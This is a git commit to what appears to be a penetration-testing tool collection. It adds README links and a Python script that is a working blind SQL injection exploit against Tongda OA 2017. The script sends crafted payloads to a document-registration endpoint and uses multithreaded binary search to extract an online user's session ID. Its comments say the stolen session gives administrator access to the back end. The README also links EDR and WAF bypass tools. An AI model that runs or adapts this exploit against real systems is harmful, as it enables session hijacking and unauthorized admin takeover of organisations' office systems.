add 通达OA 2017 版本SQL注入脚本

2025-06-20 09:50:19 +00:00 · 2020-08-23 18:52:46 +08:00 · 2020-08-23 18:52:46 +08:00 · b5106d98d4
commit b5106d98d4
parent b909c6a60e
3 changed files with 85 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -459,6 +459,7 @@
 - [fofa搜索增强版-使用fofa的url+cookies即可自动下载所有结果](./tools/fofa搜索增强版.zip)
 - [SharpBlock-A method of bypassing EDR's active projection DLL's by preventing entry point exection](https://github.com/CCob/SharpBlock)|[相关文章](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/)
 - [bypasswaf-云锁数字型注入tamper/安全狗的延时、布尔、union注入绕过tamper](https://github.com/pureqh/bypasswaf)
+- [通达OA 2017 版本SQL注入脚本](./tools/tongda_oa_2017_sql_injection.py)

 ## <span id="head8"> 文章/书籍/教程相关</span>

@ -589,6 +590,7 @@
 - [mac上Parallels Desktop安装kali linux 2020.2a并安装好Parallels Tools+Google拼音输入法](./books/mac%E4%B8%8AParallels%20Desktop%E5%AE%89%E8%A3%85kali%20linux%202020.2a%E5%B9%B6%E5%AE%89%E8%A3%85%E5%A5%BDParallels%20Tools+Google%E6%8B%BC%E9%9F%B3%E8%BE%93%E5%85%A5%E6%B3%95.docx)
 - [通达OA v11.5 多枚0day漏洞复现](./books/%E9%80%9A%E8%BE%BEOA%20v11.5%20%E5%A4%9A%E6%9E%9A0day%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.pdf)
 - [POSCMS(20200821)_任意 SQL 语句执行（需要登录后台）](./books/POSCMS_%E4%BB%BB%E6%84%8F%20SQL%20%E8%AF%AD%E5%8F%A5%E6%89%A7%E8%A1%8C%EF%BC%88%E9%9C%80%E8%A6%81%E7%99%BB%E5%BD%95%E5%90%8E%E5%8F%B0%EF%BC%89.pdf)-[原文地址](https://www.t00ls.net/thread-57551-1-1.html)|[POSCMS v3.2.0漏洞复现(getshell+前台SQL注入)](./books/POSCMS%20v3.2.0%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(getshell+%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5).pdf)-[原文地址](https://xz.aliyun.com/t/4858)
+- [多线程+二分法的巧用——通达OA 2017 SQL盲注](./books/%E5%A4%9A%E7%BA%BF%E7%A8%8B+%E4%BA%8C%E5%88%86%E6%B3%95%E7%9A%84%E5%B7%A7%E7%94%A8%E2%80%94%E2%80%94%E9%80%9A%E8%BE%BEOA%20SQL%E7%9B%B2%E6%B3%A8.pdf)-[原文地址](https://mp.weixin.qq.com/s/zH13q6xBRc58ggHqfKKi_g)


 ## <span id="head9"> 说明</span>
--- a/books/多线程+二分法的巧用——通达OA
+++ b/books/多线程+二分法的巧用——通达OA
--- a/tools/tongda_oa_2017_sql_injection.py
+++ b/tools/tongda_oa_2017_sql_injection.py
@ -0,0 +1,83 @@
+import requests
+import _thread
+import time
+requests.packages.urllib3.disable_warnings()
+
+# 测试在 通达oa 2017版本
+# 使用 多线程+二分法 跑出session id,然后替换cookie后
+# 然后访问http://www.xxx.com/general/ 即可以管理员身份登录后台
+# 来自 https://mp.weixin.qq.com/s/zH13q6xBRc58ggHqfKKi_g
+
+UNAME_length = 26
+USERUID = []
+
+header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36',"Content-Type":"application/x-www-form-urlencoded",'Connection':'close'}
+proxies = {'http': '127.0.0.1:8080','https': '127.0.0.1:8080'}
+
+def get_url(url,num,uid):
+    global UNAME_length
+    global USERUID
+
+    litgh = 48
+    right = 120
+    tmp = 0
+    while litgh <= right:
+        mid = int((litgh+right)/2)
+        if tmp == mid:
+            break
+        else: tmp = mid
+        flag = run_payload(url,uid,num,mid)
+        if flag:
+            litgh = mid
+        else:
+            right = mid
+    USERUID[num-1] = chr(mid)
+    print("session: ",num,chr(mid))
+
+def run_payload(url,uid,num,mid):
+    try:
+        payload =f"""title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/{uid},1),{num},1))>%3d{mid},1,710)))# =1&_SERVER="""
+        req = requests.post(url, headers=header, proxies=proxies,data=payload,verify=False,timeout=20,allow_redirects=False)
+        if req.status_code == 302:
+            return True
+        elif req.status_code == 500:
+            return False
+        elif req.status_code != 500:
+            return run_payload(url,uid,num,mid)
+    except Exception as e:
+        return run_payload(url,uid,num,mid)
+
+def get_uname(url,uid):
+    USERUID.clear()
+    [USERUID.append("") for one in range(0,UNAME_length)]
+    for num in range(1,UNAME_length+1):
+        _thread.start_new_thread(get_url, (url,num,uid,)) # 多线程
+
+    tmp = 0
+    while 1: # 等待跑完26位session id
+
+        flag = 0
+        for num in range(0,len(USERUID)):
+            if USERUID[num] != '':
+                flag += 1
+        uname = ""
+        for num in range(0,len(USERUID)):
+            uname += str(USERUID[num])
+        if flag != tmp:
+            print(f"已完成: {flag}/{UNAME_length}  SID:{uname}  {USERUID} ")
+
+        tmp = flag
+        if flag == UNAME_length:
+            break
+    time.sleep(0.5)
+    return uname
+
+def main(url):
+    url += "/general/document/index.php/recv/register/insert"
+    print(url)
+    uid=1 # 获取第几个用户的session
+    uname = get_uname(url,uid-1)
+    print("UNAME = ",uname)
+
+url="http://www.xxx.com/"
+main(url)